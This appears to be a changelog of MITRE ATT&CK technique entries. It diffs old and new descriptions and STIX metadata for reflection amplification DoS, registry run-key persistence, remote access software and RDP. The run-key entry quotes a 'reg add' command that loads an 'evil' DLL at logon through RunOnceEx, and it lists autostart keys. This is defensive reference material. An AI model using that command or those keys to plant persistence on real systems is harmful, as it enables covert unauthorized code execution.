>rticular, the memcache protocol showed itself to be a powerf>DoS), though the use of several others in the wild have been
>ul protocol, with amplification sizes up to 51,200 times the> documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In p
> requesting packet.(Citation: Cloudflare Memcrashed Feb 2018>articular, the memcache protocol showed itself to be a power
>)>ful protocol, with amplification sizes up to 51,200 times th
 >e requesting packet.(Citation: Cloudflare Memcrashed Feb 201
 >8)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:13:53.747000+00:002022-03-25 20:05:38.883000+00:00
descriptionAdversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)
x_mitre_version1.21.3

[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may achieve persistence by adding a program to at1Adversaries may achieve persistence by adding a program to a
> startup folder or referencing it with a Registry run key. A> startup folder or referencing it with a Registry run key. A
>dding an entry to the "run keys" in the Registry or startup >dding an entry to the "run keys" in the Registry or startup 
>folder will cause the program referenced to be executed when>folder will cause the program referenced to be executed when
> a user logs in. (Citation: Microsoft Run Key) These program> a user logs in.(Citation: Microsoft Run Key) These programs
>s will be executed under the context of the user and will ha> will be executed under the context of the user and will hav
>ve the account's associated permissions level.  Placing a pr>e the account's associated permissions level.  Placing a pro
>ogram within a startup folder will also cause that program t>gram within a startup folder will also cause that program to
>o execute when a user logs in. There is a startup folder loc> execute when a user logs in. There is a startup folder loca
>ation for individual user accounts as well as a system-wide >tion for individual user accounts as well as a system-wide s
>startup folder that will be checked regardless of which user>tartup folder that will be checked regardless of which user 
> account logs in. The startup folder path for the current us>account logs in. The startup folder path for the current use
>er is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\W>r is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Wi
>indows\Start Menu\Programs\Startup</code>. The startup folde>ndows\Start Menu\Programs\Startup</code>. The startup folder
>r path for all users is <code>C:\ProgramData\Microsoft\Windo> path for all users is <code>C:\ProgramData\Microsoft\Window
>ws\Start Menu\Programs\StartUp</code>.  The following run ke>s\Start Menu\Programs\StartUp</code>.  The following run key
>ys are created by default on Windows systems:  * <code>HKEY_>s are created by default on Windows systems:  * <code>HKEY_C
>CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</>URRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</c
>code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\C>ode> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu
>urrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Soft>rrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Softw
>ware\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKE>are\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY
>Y_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Ru>_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
>nOnce</code>  Run keys may exist under multiple hives.(Citat>Once</code>  Run keys may exist under multiple hives.(Citati
>ion: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6>on: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow64
>432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsof>32Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft
>t\Windows\CurrentVersion\RunOnceEx</code> is also available >\Windows\CurrentVersion\RunOnceEx</code> is also available b
>but is not created by default on Windows Vista and newer. Re>ut is not created by default on Windows Vista and newer. Reg
>gistry run key entries can reference programs directly or li>istry run key entries can reference programs directly or lis
>st them as a dependency. (Citation: Microsoft RunOnceEx APR >t them as a dependency.(Citation: Microsoft Run Key) For exa
>2018) For example, it is possible to load a DLL at logon usi>mple, it is possible to load a DLL at logon using a "Depend"
>ng a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWAR> key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\W
>E\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v >indows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp
>1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOn>\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018
>ceEx Mar 2018)  The following Registry keys can be used to s>)  The following Registry keys can be used to set startup fo
>et startup folder items for persistence:  * <code>HKEY_CURRE>lder items for persistence:  * <code>HKEY_CURRENT_USER\Softw
>NT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\U>are\Microsoft\Windows\CurrentVersion\Explorer\User Shell Fol
>ser Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\>ders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Win
>Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</cod>dows\CurrentVersion\Explorer\Shell Folders</code> * <code>HK
>e> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur>EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\E
>rentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL>xplorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFT
>_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\>WARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Fo
>User Shell Folders</code>  The following Registry keys can c>lders</code>  The following Registry keys can control automa
>ontrol automatic startup of services during boot:  * <code>H>tic startup of services during boot:  * <code>HKEY_LOCAL_MAC
>KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\>HINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOn
>RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Mi>ce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windo
>crosoft\Windows\CurrentVersion\RunServicesOnce</code> * <cod>ws\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_
>e>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi>MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService
>on\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Mic>s</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Window
>rosoft\Windows\CurrentVersion\RunServices</code>  Using poli>s\CurrentVersion\RunServices</code>  Using policy settings t
>cy settings to specify startup programs creates correspondin>o specify startup programs creates corresponding values in e
>g values in either of two Registry keys:  * <code>HKEY_LOCAL>ither of two Registry keys:  * <code>HKEY_LOCAL_MACHINE\Soft
>_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\>ware\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<
>Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Micro>/code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\
>soft\Windows\CurrentVersion\Policies\Explorer\Run</code>  Th>CurrentVersion\Policies\Explorer\Run</code>  The Winlogon ke
>e Winlogon key controls actions that occur when a user logs >y controls actions that occur when a user logs on to a compu
>on to a computer running Windows 7. Most of these actions ar>ter running Windows 7. Most of these actions are under the c
>e under the control of the operating system, but you can als>ontrol of the operating system, but you can also add custom 
>o add custom actions here. The <code>HKEY_LOCAL_MACHINE\Soft>actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsof
>ware\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</>t\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <co
>code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Window>de>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentV
>s NT\CurrentVersion\Winlogon\Shell</code> subkeys can automa>ersion\Winlogon\Shell</code> subkeys can automatically launc
>tically launch programs.  Programs listed in the load value >h programs.  Programs listed in the load value of the regist
>of the registry key <code>HKEY_CURRENT_USER\Software\Microso>ry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT
>ft\Windows NT\CurrentVersion\Windows</code> run when any use>\CurrentVersion\Windows</code> run when any user logs on.  B
>r logs on.  By default, the multistring <code>BootExecute</c>y default, the multistring <code>BootExecute</code> value of
>ode> value of the registry key <code>HKEY_LOCAL_MACHINE\Syst> the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentCon
>em\CurrentControlSet\Control\Session Manager</code> is set t>trolSet\Control\Session Manager</code> is set to <code>autoc
>o <code>autocheck autochk *</code>. This value causes Window>heck autochk *</code>. This value causes Windows, at startup
>s, at startup, to check the file-system integrity of the har>, to check the file-system integrity of the hard disks if th
>d disks if the system has been shut down abnormally. Adversa>e system has been shut down abnormally. Adversaries can add 
>ries can add other programs or processes to this registry va>other programs or processes to this registry value which wil
>lue which will automatically launch at boot.  Adversaries ca>l automatically launch at boot.  Adversaries can use these c
>n use these configuration locations to execute malware, such>onfiguration locations to execute malware, such as remote ac
> as remote access tools, to maintain persistence through sys>cess tools, to maintain persistence through system reboots. 
>tem reboots. Adversaries may also use [Masquerading](https:/>Adversaries may also use [Masquerading](https://attack.mitre
>/attack.mitre.org/techniques/T1036) to make the Registry ent>.org/techniques/T1036) to make the Registry entries look as 
>ries look as if they are associated with legitimate programs>if they are associated with legitimate programs.
>. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesArntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.
external_referencesCAPEC-270
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-270
external_referencesMoe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-01-06 18:36:29.226000+00:002022-06-16 13:06:00.638000+00:00
descriptionAdversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
external_references[1]['source_name']capecMalwarebytes Wow6432Node 2016
external_references[1]['url']https://capec.mitre.org/data/definitions/270.htmlhttps://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
external_references[2]['source_name']Microsoft Run KeyMicrosoft Wow6432Node 2018
external_references[2]['description']Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.
external_references[2]['url']http://msdn.microsoft.com/en-us/library/aa376977https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
external_references[3]['source_name']Microsoft Wow6432Node 2018Microsoft Run Key
external_references[3]['description']Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.
external_references[3]['url']https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registryhttp://msdn.microsoft.com/en-us/library/aa376977
external_references[4]['source_name']Malwarebytes Wow6432Node 2016Oddvar Moe RunOnceEx Mar 2018
external_references[4]['description']Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.
external_references[4]['url']https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
external_references[5]['source_name']Microsoft RunOnceEx APR 2018TechNet Autoruns
external_references[5]['description']Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[5]['url']https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-keyhttps://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[6]['source_name']Oddvar Moe RunOnceEx Mar 2018capec
external_references[6]['url']https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/https://capec.mitre.org/data/definitions/270.html
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[2]File: File ModificationProcess: Process Creation
x_mitre_data_sources[4]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDray Agha, @Purp1eW0lf, Huntress Labs
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'}

[T1219] Remote Access Software

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1An adversary may use legitimate desktop support and remote at1An adversary may use legitimate desktop support and remote a
>ccess software, such as Team Viewer, Go2Assist, LogMein, Amm>ccess software, such as Team Viewer, AnyDesk, Go2Assist, Log
>yyAdmin, etc, to establish an interactive command and contro>Mein, AmmyyAdmin, etc, to establish an interactive command a
>l channel to target systems within networks. These services >nd control channel to target systems within networks. These 
>are commonly used as legitimate technical support software, >services are commonly used as legitimate technical support s
>and may be allowed by application control within a target en>oftware, and may be allowed by application control within a 
>vironment. Remote access tools like VNC, Ammyy, and Teamview>target environment. Remote access tools like VNC, Ammyy, and
>er are used frequently when compared with other legitimate s> Teamviewer are used frequently when compared with other leg
>oftware commonly used by adversaries. (Citation: Symantec Li>itimate software commonly used by adversaries.(Citation: Sym
>ving off the Land)  Remote access tools may be established a>antec Living off the Land)  Remote access tools may be insta
>nd used post-compromise as alternate communications channel >lled and used post-compromise as alternate communications ch
>for redundant access or as a way to establish an interactive>annel for redundant access or as a way to establish an inter
> remote desktop session with the target system. They may als>active remote desktop session with the target system. They m
>o be used as a component of malware to establish a reverse c>ay also be used as a component of malware to establish a rev
>onnection or back-connect to a service or adversary controll>erse connection or back-connect to a service or adversary co
>ed system.  Admin tools such as TeamViewer have been used by>ntrolled system. Installation of many remote access tools ma
> several groups targeting institutions in countries of inter>y also include persistence (ex: the tool's installation rout
>est to the Russian state and criminal campaigns. (Citation: >ine creates a [Windows Service](https://attack.mitre.org/tec
>CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blo>hniques/T1543/003)).  Admin tools such as TeamViewer have be
>g TeamSpy)>en used by several groups targeting institutions in countrie
 >s of interest to the Russian state and criminal campaigns.(C
 >itation: CrowdStrike 2015 Global Threat Report)(Citation: Cr
 >ySyS Blog TeamSpy)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 20:42:37.320000+00:002022-04-21 14:54:10.899000+00:00
descriptionAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land) Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
external_references[1]['source_name']Symantec Living off the LandCrowdStrike 2015 Global Threat Report
external_references[1]['description']Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.
external_references[1]['url']https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdfhttps://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
external_references[2]['source_name']CrowdStrike 2015 Global Threat ReportCrySyS Blog TeamSpy
external_references[2]['description']CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.
external_references[2]['url']https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdfhttps://blog.crysys.hu/2013/03/teamspy/
external_references[3]['source_name']CrySyS Blog TeamSpySymantec Living off the Land
external_references[3]['description']CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.
external_references[3]['url']https://blog.crysys.hu/2013/03/teamspy/https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
x_mitre_data_sources[0]Process: Process CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowProcess: Process Creation
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsZachary Stanford, @svch0st

[T1021.001] Remote Services: Remote Desktop Protocol

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to log into a computer using the Remote >g/techniques/T1078) to log into a computer using the Remote 
>Desktop Protocol (RDP). The adversary may then perform actio>Desktop Protocol (RDP). The adversary may then perform actio
>ns as the logged-on user.  Remote desktop is a common featur>ns as the logged-on user.  Remote desktop is a common featur
>e in operating systems. It allows a user to log into an inte>e in operating systems. It allows a user to log into an inte
>ractive session with a system desktop graphical user interfa>ractive session with a system desktop graphical user interfa
>ce on a remote system. Microsoft refers to its implementatio>ce on a remote system. Microsoft refers to its implementatio
>n of the Remote Desktop Protocol (RDP) as Remote Desktop Ser>n of the Remote Desktop Protocol (RDP) as Remote Desktop Ser
>vices (RDS).(Citation: TechNet Remote Desktop Services)   Ad>vices (RDS).(Citation: TechNet Remote Desktop Services)   Ad
>versaries may connect to a remote system over RDP/RDS to exp>versaries may connect to a remote system over RDP/RDS to exp
>and access if the service is enabled and allows access to ac>and access if the service is enabled and allows access to ac
>counts with known credentials. Adversaries will likely use C>counts with known credentials. Adversaries will likely use C
>redential Access techniques to acquire credentials to use wi>redential Access techniques to acquire credentials to use wi
>th RDP. Adversaries may also use RDP in conjunction with the>th RDP. Adversaries may also use RDP in conjunction with the
> [Accessibility Features](https://attack.mitre.org/technique> [Accessibility Features](https://attack.mitre.org/technique
>s/T1546/008) technique for Persistence.(Citation: Alperovitc>s/T1546/008) or [Terminal Services DLL](https://attack.mitre
>h Malware)>.org/techniques/T1505/005) for Persistence.(Citation: Alpero
 >vitch Malware)
Details
